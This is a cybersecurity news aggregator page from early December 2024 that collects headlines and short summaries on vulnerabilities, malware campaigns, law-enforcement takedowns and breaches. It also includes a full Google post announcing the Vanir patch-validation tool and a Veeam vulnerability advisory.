Security News
The latest cybersecurity news, collected from a wide range of security websites.
2024-12-06 00:46:58
Hundreds of Cisco switches impacted by bootloader flaw
A bootloader vulnerability in Cisco NX-OS affects 100+ switches, allowing attackers to bypass image signature checks. Cisco released security patches for a vulnerability, tracked as CVE-2024-20397 (CVSS score of 5.2), in the NX-OS software’s bootloader that could be exploited by attackers to bypass image signature verification. “A vulnerability in the bootloader of Cisco NX-OS Software could […]
by Security Affairs
2024-12-05 22:18:03
Library of Congress Offers AI Legal Guidance to Researchers
Researchers testing generative AI systems can use prompt injection, re-register after being banned, and bypass rate limits without running afoul of copyright law.
by Dark Reading
2024-12-05 22:15:18
Chinese Hackers Breach US Firm, Maintain Network Access for Months
SUMMARY: A large U.S. company with operations in China fell victim to a large-scale cyberattack earlier this year,…
by Hackread
2024-12-05 22:04:39
Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels
Cloudflare Tunnels is just the latest legitimate cloud service that cybercriminals and state-sponsored threat actors are abusing to hide their tracks.
by Dark Reading
2024-12-05 21:28:00
This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges
As many as 77 banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot. "DroidBot is a modern RAT that combines hidden VNC and overlay attack techniques with spyware-like capabilities, such as keylogging and user interface monitoring," Cleafy researchers Simone Mattia, Alessandro
by The Hacker News
2024-12-05 21:18:49
US org with ‘significant presence in China’ targeted by hackers, Symantec says
The cybersecurity firm did not name the company but said the attack was “likely carried out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers.”
by The Record
2024-12-05 21:13:03
Bypass Bug Revives Critical N-Day in Mitel MiCollab
A single barrier prevented attackers from exploiting a critical vulnerability in an enterprise collaboration platform. Now there's a workaround.
by Dark Reading
2024-12-05 20:49:12
Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges
At least 17 affiliate groups have used the "DroidBot" Android banking Trojan against 77 financial services companies across Europe, with more to come, researchers warn.
by Dark Reading
2024-12-05 20:38:40
OpenAI Adds $200 Monthly ChatGPT Pro Subscription With New Model
The new ChatGPT Pro option will cost $200 a month and offer access to an expanded version of o1.
by ITPro Today
2024-12-05 20:26:00
Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access
Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. The critical vulnerability in question is CVE-2024-41713 (CVSS score: 9.8), which relates to a case of insufficient input
by The Hacker News
2024-12-05 20:25:00
Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers
Europol on Thursday announced the shutdown of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale. The operation, led by German authorities, has resulted in the seizure of more than 50 servers associated with the service and the arrest of two suspects. More than 200 terabytes of digital evidence have been collected. Manson Market ("manson-market[.]pw") is
by The Hacker News
2024-12-05 20:22:34
Pegasus Spyware Infections Proliferate Across iOS, Android Devices
The notorious spyware from Israel's NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 2,500 mobile phones.
by ITPro Today
2024-12-05 20:11:46
As Trump vows to remold intel agencies, US spy chief defends current model
“I do think we're safer as a consequence of the institution that I have the privilege to lead right now,” Director of National Intelligence Avril Haines said during an event at the Council on Foreign Relations in Washington, D.C.
by The Record
2024-12-05 19:59:11
LLMs Raise Efficiency, Productivity of Cybersecurity Teams
AI-powered tools are making cybersecurity tasks easier to solve, as well as easier for the team to handle.
by Dark Reading
2024-12-05 19:55:47
Major USAID contractor Chemonics says 263,000 affected by 2023 data breach
Chemonics, which has more than $1 billion in federal government contracts, announced it had discovered a data breach that stretched from mid-2023 into early 2024.
by The Record
2024-12-05 19:33:28
Need a Wyze Cam alternative? The waterproof Blink Mini 2 security camera is my pick
The Blink Mini 2 is feature-rich, and it includes a waterproof adapter that makes it that much sweeter.
by ZDNET Security
2024-12-05 19:15:08
Top 5 Mobile Security Risks for Enterprises
Our blog is sharing the five biggest mobile security threats your business needs to be aware of.
by Zimperium
2024-12-05 19:14:22
The best security keys of 2024: Expert tested
Security keys are physical security solutions for protecting your online accounts. We tested the best security keys that combine safety and convenience to protect you from hackers.
by ZDNET Security
2024-12-05 19:06:07
Turning threat intelligence into action: Key insights from our MITRE ATT&CK webinar
Discover how financial services can operationalize threat intelligence with MITRE ATT&CK. Learn key strategies for cybersecurity resilience in our expert-led webinar.
by Hack The Box Blog
2024-12-05 19:05:43
Report: Russian authorities seized phone from detainee, infected it with spyware
The phone belonging to Kirill Parubets, a Russian programmer who spent more than two weeks in custody, was apparently infected with spyware that the researchers say allowed authorities to track his device location, read encrypted messages and record calls and keystrokes.
by The Record
2024-12-05 19:05:31
Nebraska man pleads guilty to dumb cryptojacking operation
A Nebraska man pleaded guilty on Thursday to operating a large-scale cryptojacking operation after being arrested and charged in April. [...]
by BleepingComputer
2024-12-05 19:02:19
The adventures of an extroverted cyber nerd and the people Talos helps to fight the good fight
Ever wonder what an extroverted strategy security nerd does? Wonder no longer! This week, Joe pontificates on his journey at Talos, and then is inspired by the people he gets to meet and help.
by Cisco Talos Blog
2024-12-05 18:57:01
Romania's election systems targeted in over 85,000 cyberattacks
A declassified report from Romania's Intelligence Service says that the country's election infrastructure was targeted by more than 85,000 cyberattacks. [...]
by BleepingComputer
2024-12-05 18:52:18
Chemonics discloses months-long breach affecting 263K people
The major USAID contractor says unauthorized access continued up to 25 days after the intrusion was first detected.
by SC Media
2024-12-05 18:39:10
Russian state hackers abuse Cloudflare services to spy on Ukrainian targets
The group known as Gamaredon has been observed using Cloudflare Tunnels — a tool that helps hide the real location of servers or infrastructure — to infect their targets with custom GammaDrop malware and stay undetected.
by The Record
2024-12-05 18:32:36
One Identity Named Winner of the Coveted Top InfoSec Innovator Awards for 2024
One Identity wins "Hot Company: Privileged Access Management" at the 12th Cyber Defense Magazine InfoSec Innovator Awards, showcasing PAM excellence in cybersecurity.
by Hackread
2024-12-05 18:16:00
Want to Grow Vulnerability Management into Exposure Management? Start Here!
Vulnerability Management (VM) has long been a cornerstone of organizational cybersecurity. Nearly as old as the discipline of cybersecurity itself, it aims to help organizations identify and address potential security issues before they become serious problems. Yet, in recent years, the limitations of this approach have become increasingly evident. At its core, Vulnerability Management
by The Hacker News
2024-12-05 18:13:00
Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor
A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs. "Earth Minotaur uses MOONSHINE to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a
by The Hacker News
2024-12-05 17:36:08
Police Dismantle Manson Market, Seize 50 Servers and 200TB Evidence
SUMMARY: A day after taking down the cybercrime platform MATRIX, Europol and international law enforcement agencies have successfully…
by Hackread
2024-12-05 17:32:57
The Future of eCommerce: How Custom Apps Help You Get Ahead of the Competition
Discover the future of eCommerce with bespoke app development. Learn how tailored solutions enhance user experience, security, and performance while empowering businesses to meet unique needs and gain a competitive edge.
by Hackread
2024-12-05 17:15:05
U.S. org suffered four-month intrusion by Chinese hackers
A large U.S. organization with significant presence in China has been reportedly breached by China-based threat actors who persisted on its networks from April to August 2024. [...]
by BleepingComputer
2024-12-05 17:08:54
Six identity takeaways from 2024's cyber blunders and breaches
From phishing traps to third-party risks, these hard-hitting insights reveal what went wrong—and how to fortify your identity defenses for the future.
by SC Media
2024-12-05 17:00:27
BlueAlpha Russian hackers caught abusing Cloudflare services
A notorious Kremlin-backed hacking group is using a legitimate network service to coordinate targeted attacks.
by SC Media
2024-12-05 16:50:08
I-O Data Confirms Zero-Day Attacks on Routers, Full Patches Pending
Japanese device maker confirms zero-day router exploitation and warns that full patches won’t be available for a few weeks.
by SecurityWeek
2024-12-05 16:42:36
Telecom Giant BT Group Hit by Black Basta Ransomware
BT Group, a major telecommunications firm, has been hit by a ransomware attack from the Black Basta group. The attack targeted the company's Conferencing division, leading to server shutdowns and potential data theft.
by Hackread
2024-12-05 16:30:00
Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers
A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion. According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August. However, the company doesn't rule out the possibility that the intrusion may have occurred earlier. "The attackers moved laterally
by The Hacker News
2024-12-05 16:17:30
Black Basta attack disrupts BT unit's servers
While BT Group emphasized that only its BT Conferencing platform had been subjected to an attempted compromise that did not affect its other services, Black Basta claimed to have exfiltrated 500 GB of data from the firm's servers, including user information, personal documents, nondisclosure agreements, financial and organizational details, and other confidential files.
by SC Media
2024-12-05 16:10:52
Turla targets Pakistani APT infrastructure for espionage
After achieving initial access to a Storm-0156 C2 server in December 2022, Turla sought to take over more of the Pakistani threat operation's C2s to compromise Afghan government organizations' networks with the TwoDash downloader and Statuezy trojan.
by SC Media
2024-12-05 16:01:57
Salt Typhoon hack assessment imminent, says Easterly
"We wanted to make sure we did it before the holidays, so we could start writing out how we think about the problem, and then ultimately, what are the key recommendations that we need to bring forward to enable us to strengthen the security of the telecommunications networks going forward," said Easterly.
by SC Media
2024-12-05 15:58:36
'Earth Minotaur' Exploits WeChat Bugs, Sends Spyware to Uyghurs
The emerging threat actor, potentially a Chinese state-sponsored APT, is using the known exploit kit Moonshine in cross-platform attacks that deliver a previously undisclosed backdoor called "DarkNimbus" to ethnic minorities, including Tibetans.
by Dark Reading
2024-12-05 15:51:56
The Dumbest Thing in Security This Week: The Hacker Who Threatened the Wrong Person
Pro tip for hackers: Don’t threaten people whose specialty is uncovering the identity of cybercriminals. That mistake apparently led to the October arrest of Alexander “Connor” Moucka, 25, the alleged mastermind behind the massive Snowflake data breach earlier this year. The Kitchener, Ontario resident is currently in Maplehurst Correctional Complex awaiting extradition proceedings that will determine whether he stands trial in the U.S. Here’s the story behind Moucka’s arrest, or as much of it as investigators are willing to reveal.

Hacker Threats 'The Stupidest Thing Ever'
Moucka had allegedly been boasting about his exploits on Telegram under the alias ‘Waifu’ when he threatened Unit221B Chief Research Officer Allison Nixon – who then assigned one of her researchers to find out his real identity, according to the Waterloo Region Record. “Why would he target a company that is not working on his case and specializes in identifying cybercriminals?” Nixon told the Toronto-based paper. “It is just the stupidest thing ever.” It took several months – and one critical operational mistake by Waifu – before Moucka’s name was handed over to law enforcement. Nixon isn’t saying much about Waifu’s mistakes in order to keep cybercriminals from learning from them. Nor is she saying much about the threats he made, telling The Cyber Express that they included “every kind of bad language that kids on the internet say basically.” A threat actor who goes by the alias “kiberphant0m” has taken up Moucka’s cause since the arrest, in addition to selling data from Snowflake and other breaches – including what may be older call logs from President-elect Donald Trump and Vice President Kamala Harris. Asked if she had any idea who kiberphant0m is, Nixon replied, “no comment.”

Waifu’s History Allegedly Includes 'The Com'
Nixon first crossed paths with “Waifu” in 2019 when the New York Police Department was seeking information about the hacker, who identified as a member of “The Com,” a loose cybercrime collective she had been tracking that also includes the group known as “Scattered Spider.” The Com has also been linked to extortion, violence, swatting and other disturbing acts, so a threat from a member wasn’t something to be taken lightly. Nixon reveals something of her own exploits on her X feed, and some of her posts have a bit of a taunting tone, such as saying “this guy spent too much time posting and not enough getting a lawyer” while linking to an article on an arrest. And while she doesn’t directly say which cases she was involved in, there are hints, such as posting “Who wants to be next?” when linking to an arrest. She did that with news of Moucka’s arrest, and again recently when linking to the case of Remington Ogletree, a 19-year-old alleged Scattered Spider member charged with telecom and financial breaches. This is probably wasted advice given the culture of some threat groups, but be careful who you pick fights with online. You might be dealing with a formidable opponent like Nixon.
by The Cyber Express
2024-12-05 15:48:55
Balbix unveils new AI-powered cybersecurity tools
The offerings are AI cybersecurity assistant BIX, Cyber Risk Assessments, a one-time AI-powered vulnerability evaluation, and a continuous threat and exposure management platform called D3.
by SC Media
2024-12-05 15:43:59
U.K. cybersecurity chief warns of increasing cyber threats
Richard Horne, a senior official at the agency, highlighted how adversaries exploit the nation’s technological dependence to maximize disruption and destruction.
by SC Media
2024-12-05 15:40:48
German authorities dismantle 'Crimenetwork' marketplace
The site, which has been in operation since 2012, boasted over 100 vendors and 100,000 customers, facilitating illegal transactions in cryptocurrencies like Bitcoin and Monero.
by SC Media
2024-12-05 15:39:04
Burnout in SOCs: How AI Can Help Analysts Focus on High-Value Tasks
SOC analysts, vital to cybersecurity, face burnout due to exhausting workloads, risking their well-being and the effectiveness of organizational defenses. Security Operations Center (SOC) analyst burnout is a very real problem. These are some of the most important cybersecurity professionals out there, and many of them are being worked to exhaustion. Amidst an already overstretched […]
by Security Affairs
2024-12-05 15:31:18
US arrests Scattered Spider suspect linked to telecom hacks
U.S. authorities have arrested a 19-year-old teenager linked to the notorious Scattered Spider cybercrime gang who is now charged with breaching a U.S. financial institution and two unnamed telecommunications firms. [...]
by BleepingComputer
2024-12-05 15:30:49
Law enforcement shuts down Manson Market cybercrime marketplace
Europol has supported the dismantling of a sophisticated criminal network responsible for facilitating large-scale online fraud. In an operation led by the Hanover Police Department (Polizeidirektion Hannover) and the Verden Public Prosecutor’s Office (Staatsanwaltschaft Verden) in Germany, and supported by law enforcement authorities from Austria, Czechia, Finland, Poland and the Netherlands, over 50 servers were seized, significant digital evidence was secured, and two key suspects were arrested.
A central hub for cyber fraud
The investigation …
by Help Net Security
2024-12-05 15:23:28
North Korean IT infiltrations expected to persist
Security researchers at the recent Cyberwarcon conference in Washington, D.C., detailed North Korea’s increasing use of fraudulent IT workers to infiltrate multinational corporations and funnel earnings to the North Korean regime while conducting corporate data theft to support the country’s nuclear weapons program.
by SC Media
2024-12-05 15:09:07
Operation Destabilise dismantled Russian money laundering networks
Operation Destabilise: The U.K. National Crime Agency disrupted Russian money laundering networks tied to organized crime. The U.K. National Crime Agency (NCA) disrupted Russian money laundering networks linked to organized crime across the U.K., Middle East, Russia, and South America as part of an operation called “Operation Destabilise.” “An international NCA-led investigation – Operation Destabilise […]
by Security Affairs
2024-12-05 15:00:00
ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & Breaches
This blog will be referencing the ICS/OT Backdoors & Breaches expansion deck created by BHIS and Dragos. We will be reviewing the ICS-focused Initial Compromise cards that are used to simulate a cyber incident and suggest potential mitigations to what is presented.
by Black Hills Information Security
2024-12-05 15:00:00
Vulnerability Management Challenges in IoT & OT Environments
By understanding the unique challenges of protecting IoT and OT devices, organizations can safeguard these critical assets against evolving cyber threats.
by Dark Reading
2024-12-05 15:00:00
Kubernetes 1.32 – What’s new?
Kubernetes 1.32 is right around the corner, and there are quite a lot of changes ready for the Holiday Season!...
by Sysdig
2024-12-05 14:59:33
Americans urged to use encrypted messaging after large, ongoing cyberattack
US telecom providers have been infiltrated to a worrying level by an APT group. The advice is to use encrypted messaging.
by Malwarebytes Labs
2024-12-05 14:50:00
Security for Amazon EKS hybrid nodes: Bridging cloud and on-premises Kubernetes security
The introduction of Amazon Elastic Kubernetes Service (EKS) Hybrid Nodes by AWS is a game-changer for organizations striving to unify...
by Sysdig
2024-12-05 14:45:00
3 Lessons from Barracuda’s 2024 Hackathon
Continuing our tradition of conducting internal hackathons (sometimes called Cudathons) each year, Barracuda recently hosted a hackathon with our product teams from around the world to help drive innovation and fresh ideas.
by Barracuda
2024-12-05 14:30:53
Mitek Digital Fraud Defender combats AI-generated fraud
Mitek announced Digital Fraud Defender (DFD), an advanced, multi-layered solution to safeguard digital identity verification processes against sophisticated AI-enabled fraud tactics. Designed for financial institutions, fintech, online gaming providers, and enterprises requiring remote identity verification, the new suite addresses the urgent and growing challenges posed by generative AI’s potential to create highly realistic fake images, documents, and videos. According to Deloitte’s Center for Financial Services, fraud losses from generative AI could surge from $12.3 billion …
by Help Net Security
2024-12-05 14:24:32
Mitel MiCollab zero-day and PoC exploit unveiled
A zero-day vulnerability in the Mitel MiCollab enterprise collaboration suite can be exploited to read files containing sensitive data, watchTowr researcher Sonny Macdonald has disclosed, and followed up by releasing a proof-of-concept (PoC) exploit that chains together this zero-day file read vulnerability with CVE-2024-41713, which allows attackers to bypass authentication.
A zero-day and PoC to grab sensitive info of MiCollab users
In a blog post published on Thursday, Macdonald tells of watchTowr’s quest to reproduce …
by Help Net Security
2024-12-05 14:12:39
Bitdefender GravityZone XDR enhancements protect business data stored in the cloud
Bitdefender announced enhancements to its GravityZone XDR platform with the addition of its new Business Applications sensor, designed to protect corporate data hosted and stored in cloud-based productivity and collaboration applications. The sensor will initially support Atlassian cloud applications including Confluence, Jira, and Bitbucket, with plans to extend to other popular software-as-a-service (SaaS) platforms frequently used in business operations. “XDR provides organizations with the visibility needed to monitor, correlate, and respond quickly to security events …
by Help Net Security
2024-12-05 14:02:03
Jazzer Back to Open Source: New Features
We are beyond excited to share some fantastic news with our community: Jazzer is now fully open source again under the Apache 2.0 license! 🎉
by Code Intelligence
2024-12-05 14:00:45
Watch Now: Cyber AI & Automation Summit - All Sessions Available On Demand
SecurityWeek’s Cyber AI & Automation Summit took place on December 4th, as an online event.
by SecurityWeek
2024-12-05 14:00:00
Roundup: The top ransomware stories of 2024
The year 2024 saw a marked increase in the competence, aggression and unpredictability of ransomware attackers. Nearly all the key numbers are up — more ransomware gangs, bigger targets and higher payouts. Malicious ransomware groups also focus on critical infrastructure and supply chains, raising the stakes for victims and increasing the motivation to cooperate. Here […]
by Security Intelligence
2024-12-05 13:47:17
Netography introduces AI-powered ransomware detection capabilities
Netography announced new ransomware detection capabilities that enable organizations to respond to malicious activity in real-time before it disrupts operations or threatens business continuity. These AI-powered enhancements enable Fusion customers to close the network observability and security gaps caused by limitations in their existing platform-native and cloud-native tools, including the inability to detect malicious activity and the lack of a holistic view of all network activity. The scope of the ransomware problem continues to grow, …
by Help Net Security
2024-12-05 13:46:51
“aiocpa” Python Package Exposed as Cryptocurrency Infostealer
SUMMARY: The machine learning-based threat-hunting system of leading threat intelligence and cybersecurity firm ReversingLabs (RL) recently detected malicious…
by Hackread
2024-12-05 13:46:46
5 Common Threat Actor Tactics Used in Cloud, Identity, and SaaS Attacks
Explore five common tactics used in cloud attacks and recommendations on how to defend against them.
by Mitiga
2024-12-05 13:26:49
‘DroidBot’ Android Trojan Targets Banking, Cryptocurrency Applications
The newly discovered DroidBot Android trojan targets 77 banks, cryptocurrency exchanges, and national organizations.
by SecurityWeek
2024-12-05 13:24:25
Middesk Address Risk Insights strengthens onboarding processes
Middesk introduced Address Risk Insights, a critical new addition to its core Know Your Business (KYB) product Verify and its recently introduced risk scoring Signal product. A first for the KYB space, Address Risk Insights helps companies assess the risk of a business’s address during onboarding or ongoing monitoring, ensuring they approve only trusted and legitimate customers. Nine out of 10 enterprises and small businesses deal with identity fraud in a given year according to …
by Help Net Security
2024-12-05 13:21:23
New Android Spyware Used by Russian State-Backed Entities Found
A recent investigation by Citizen Lab and First Department revealed that spyware resembling the notorious Monokle family was implanted on a device returned to a Russian programmer after his detention. The malware, linked to Russian state-backed entities, demonstrates advanced surveillance capabilities, raising concerns about its use for targeted espionage. Monokle spyware, first identified in 2019 …
by Cyber Insider
2024-12-05 13:20:00
What are Common Criteria (CC) for Information Technology Security Evaluation?
by ComputerWeekly
2024-12-05 13:10:31
50 Servers Linked to Cybercrime Marketplace and Phishing Sites Seized by Law Enforcement
Europol announced an operation targeting a cybercrime marketplace and phishing websites, including the arrests of two suspects.
by SecurityWeek
2024-12-05 13:00:13
The Cybersecurity Challenge in Mergers and Acquisitions
Take a deep dive into five critical M&A cyber threats we’ve recently helped our customers navigate.
by ReliaQuest
2024-12-05 13:00:00
ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan
The China-linked threat actor known as MirrorFace has been attributed to a new spear-phishing campaign mainly targeting individuals and organizations in Japan since June 2024. The aim of the campaign is to deliver backdoors known as NOOPDOOR (aka HiddenFace) and ANEL (aka UPPERCUT), Trend Micro said in a technical analysis. "An interesting aspect of this campaign is the comeback of a backdoor
by The Hacker News
2024-12-05 12:53:00
Announcing the launch of Vanir: Open-source Security Patch Validation
Posted by Hyunwook Baek, Duy Truong, Justin Dunlap and Lauren Stan from Android Security and Privacy, and Oliver Chang from the Google Open Source Security Team

Today, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches. Vanir significantly accelerates patch validation by automating this process, allowing OEMs to ensure devices are protected with critical security updates much faster than traditional methods. This strengthens the security of the Android ecosystem, helping to keep Android users around the world safe.

By open-sourcing Vanir, we aim to empower the broader security community to contribute to and benefit from this tool, enabling wider adoption and ultimately improving security across various ecosystems. While initially designed for Android, Vanir can be easily adapted to other ecosystems with relatively small modifications, making it a versatile tool for enhancing software security across the board. In collaboration with the Google Open Source Security Team, we have incorporated feedback from our early adopters to improve Vanir and make it more useful for security professionals. This tool is now available for you to start developing on top of, and integrating into, your systems.

The need for Vanir
The Android ecosystem relies on a multi-stage process for vulnerability mitigation. When a new vulnerability is discovered, upstream AOSP developers create and release upstream patches. The downstream device and chip manufacturers then assess the impact on their specific devices and backport the necessary fixes. This process, while effective, can present scalability challenges, especially for manufacturers managing a diverse range of devices and old models with complex update histories. Managing patch coverage across diverse and customized devices often requires considerable effort due to the manual nature of backporting.

To streamline the vital security workflow, we developed Vanir. Vanir provides a scalable and sustainable solution for security patch adoption and validation, helping to ensure Android devices receive timely protection against potential threats.

The power of Vanir
Source-code-based static analysis
Vanir’s first-of-its-kind approach to Android security patch validation uses source-code-based static analysis to directly compare the target source code against known vulnerable code patterns. Vanir does not rely on traditional metadata-based validation mechanisms, such as version numbers, repository history and build configs, which can be prone to errors. This unique approach enables Vanir to analyze entire codebases with full history, individual files, or even partial code snippets.

A main focus of Vanir is to automate the time-consuming and costly process of identifying missing security patches in the open source software ecosystem. During the early development of Vanir, it became clear that manually identifying a high volume of missing patches is not only labor intensive but also can leave user devices inadvertently exposed to known vulnerabilities for a period of time. To address this, Vanir utilizes novel automatic signature refinement techniques and multiple pattern analysis algorithms, inspired by the vulnerable code clone detection algorithms proposed by Jang et al. [1] and Kim et al. [2]. These algorithms have low false-alarm rates and can effectively handle broad classes of code changes that might appear in code patch processes. In fact, based on our 2-year operation of Vanir, only 2.72% of signatures triggered false alarms. This allows Vanir to efficiently find missing patches, even with code changes, while minimizing unnecessary alerts and manual review efforts.

Vanir's source-code-based approach also enables rapid scaling across any ecosystem. It can generate signatures for any source files written in supported languages. Vanir's signature generator automatically generates, tests, and refines these signatures, allowing users to quickly create signatures for new vulnerabilities in any ecosystem simply by providing source files with security patches. Android’s successful use of Vanir highlights its efficiency compared to traditional patch verification methods. A single engineer used Vanir to generate signatures for over 150 vulnerabilities and verify missing security patches across its downstream branches – all within just five days.

Vanir for Android
Currently Vanir supports C/C++ and Java targets and covers 95% of Android kernel and userspace CVEs with public security patches. Google Android Security team consistently incorporates the latest CVEs into Vanir’s coverage to provide a complete picture of the Android ecosystem’s patch adoption risk profile. The Vanir signatures for Android vulnerabilities are published through the Open Source Vulnerabilities (OSV) database. This allows Vanir users to seamlessly protect their codebases against the latest Android vulnerabilities without any additional updates. Currently, there are over 2,000 Android vulnerabilities in OSV, and scanning an entire Android source tree can take 10-20 minutes with a modern PC.

Flexible integration, adoption and expansion
Vanir is developed not only as a standalone application but also as a Python library. Users who want to integrate automated patch verification processes with their continuous build or test chain may easily achieve it by wiring their build integration tool with Vanir scanner libraries. For instance, Vanir is integrated with a continuous testing pipeline in Google, ensuring all security patches are adopted in the ever-evolving Android codebase and their first-party downstream branches.

Vanir is also fully open-sourced, and under BSD-3 license. As Vanir is not fundamentally limited to the Android ecosystem, you may easily adopt Vanir for the ecosystem that you want to protect by making relatively small modifications in Vanir. In addition, since Vanir’s underlying algorithm is not limited to security patch validation, you may modify the source and use it for different purposes such as licensed code detection or code clone detection. The Android Security team welcomes your contributions to Vanir for any direction that may expand its capability and scope. You can also contribute to Vanir by providing vulnerability data with Vanir signatures to OSV.

Vanir Results
Since early last year, we have partnered with several Android OEMs to test the tool’s effectiveness. Internally we have been able to integrate the tool into our build system, continuously testing against over 1,300 vulnerabilities. Currently Vanir covers 95% of all Android, Wear, and Pixel vulnerabilities with public fixes across Android Kernel and Userspace. It has a 97% accuracy rate, which has saved our internal teams over 500 hours to date in patch fix time.

Next steps
We are happy to announce that Vanir is now available for public use. Vanir is not technically limited to Android, and we are also actively exploring problems that Vanir may help address, such as general C/C++ dependency management via integration with OSV-scanner. If you are interested in using or contributing to Vanir, please visit github.com/google/vanir. Please join our public community to submit your feedback and questions on the tool. We look forward to working with you on Vanir!
by Google Security Blog
2024-12-05 12:48:28
Operation Tinsel Trace II: Join the resistance against Krampus!Krampus has left some gifts for Santa, it turns out—it’s malware. Use your holiday spirit to hone in and eliminate the threat!
by Hack The Box Blog
2024-12-05 12:44:54
Police shuts down Manson cybercrime market, arrests key suspectsGerman law enforcement has seized over 50 servers that hosted the Manson Market cybercrime marketplace and fake online shops used in phishing operations. [...]
by BleepingComputer
2024-12-05 12:42:51
How laws strain to keep pace with AI advances and data theftKey questions remain unresolved concerning the use of Gen AI tools, while one country may need stronger deterrence against data theft.
by ZDNET Security
2024-12-05 12:30:13
Atrium Health Discloses Data Exposure Involving Patient PortalAtrium Health has issued a public notification regarding a privacy issue that potentially exposed patient data through the use of online tracking technologies on its MyAtriumHealth Patient Portal. The issue stems from tracking tools active between January 2015 and July 2019, which may have transmitted limited personal information to third-party vendors, such as Google and … The post Atrium Health Discloses Data Exposure Involving Patient Portal appeared first on CyberInsider.
by Cyber Insider
2024-12-05 12:30:00
Government agencies urged to use encrypted messaging after Chinese Salt Typhoon hack
by ComputerWeekly
2024-12-05 12:30:00
Bootloader Vulnerability Impacts Over 100 Cisco SwitchesMore than 100 Cisco products are affected by an NX-OS vulnerability that allows attackers to bypass image signature verification. The post Bootloader Vulnerability Impacts Over 100 Cisco Switches appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 12:18:11
8 US telcos compromised, FBI advises Americans to use encrypted communicationsFBI and Cybersecurity and Infrastructure Security Agency (CISA) officials have advised Americans to use encrypted call and messaging apps to protect their communications from threat actors that have – and will – burrow into the networks and systems of US telecommunication companies. NBC News reported that the advice was given during a conference call with the media on Tuesday, during which the official also shared that the compromise of the networks of multiple US telcos … More → The post 8 US telcos compromised, FBI advises Americans to use encrypted communications appeared first on Help Net Security.
by Help Net Security
2024-12-05 12:17:25
New Android spyware found on phone seized by Russian FSB. After a Russian programmer was detained by Russia's Federal Security Service (FSB) for fifteen days and his phone confiscated, it was discovered that a new spyware was secretly installed on his device upon its return. [...]
by BleepingComputer
2024-12-05 12:07:08
What is Cross-Site Scripting (XSS)?Cross-site scripting is a type of attack where a vulnerability in web applications is exploited and malicious script is injected into the site content.
by ThreatDown
2024-12-05 12:05:02
Tor Project Retires BridgeDB in Favor of Rdsys to Fight Censorship. The Tor Project has transitioned from its longstanding bridge distribution system, BridgeDB, to a more advanced and flexible platform known as Rdsys. This move aims to enhance the network's resilience against evolving censorship tactics and improve overall user accessibility. BridgeDB, introduced over a decade ago, functioned as a prototype to assist users in bypassing censorship … The post Tor Project Retires BridgeDB in Favor of Rdsys to Fight Censorship appeared first on CyberInsider.
by Cyber Insider
2024-12-05 12:00:00
Chemonics International Data Breach Impacts 260,000 IndividualsDevelopment firm Chemonics International has disclosed a year-old data breach impacting over 260,000 people. The post Chemonics International Data Breach Impacts 260,000 Individuals appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 11:58:58
Critical Veeam Vulnerabilities Expose Service Provider Console to Cyber Risks

Veeam has published a critical advisory regarding severe vulnerabilities affecting its Veeam Service Provider Console (VSPC), particularly impacting version 8.1.0.21377 and earlier builds from version 7. These Veeam vulnerabilities, identified as CVE-2024-42448 and CVE-2024-42449, expose service providers to online security risks. These vulnerabilities in Veeam are especially concerning due to their potential to compromise system integrity, data confidentiality, and network security.

Overview of the Veeam Vulnerabilities

The Veeam vulnerabilities, disclosed as part of Veeam’s December 2024 updates, have been classified with high severity levels, with CVE-2024-42448 rated as critical, and CVE-2024-42449 deemed high in severity. Both vulnerabilities exist due to flaws within the Veeam Service Provider Console 8.1 and affect all builds of version 8.1 and prior, including earlier builds from version 7. These vulnerabilities impact the management agent machines authorized on the VSPC server, which means that an attacker with control over a management agent could exploit these vulnerabilities to access or manipulate the server.

CVE-2024-42448: Remote Code Execution (RCE)

The first Veeam vulnerability, CVE-2024-42448, allows for Remote Code Execution (RCE). This occurs when an attacker gains access to a VSPC management agent machine that is authorized on the server. Once this condition is met, an attacker can execute arbitrary code remotely on the VSPC server machine. This critical flaw has been assigned a CVSS v3.1 score of 9.9—the highest possible severity rating—due to its potential to completely compromise a system. Internal testing discovered this flaw, highlighting the risk that it poses to organizations relying on the Veeam Service Provider Console for backup management.

CVE-2024-42449: NTLM Hash Leak and File Deletion

CVE-2024-42449 presents another serious security risk, allowing attackers to exploit the management agent machine to leak an NTLM hash of the VSPC server’s service account. Additionally, this vulnerability allows attackers to delete files on the VSPC server machine. Although not as severe as RCE, this flaw still represents a high risk, with a CVSS v3.1 score of 7.1. By gaining access to NTLM hashes, attackers could potentially escalate their privileges within the system, leading to further data breaches or malicious actions.

Updates and Patches

Veeam responded to the vulnerabilities by releasing a critical patch to mitigate these issues. Service providers using Veeam Service Provider Console version 8.1 are encouraged to update to the latest available build, 8.1.0.21999, which addresses both CVE-2024-42448 and CVE-2024-42449. It is important to note that no mitigations are available for these vulnerabilities besides upgrading to the patched version. Thus, users of affected versions are strongly urged to install the cumulative update as soon as possible.

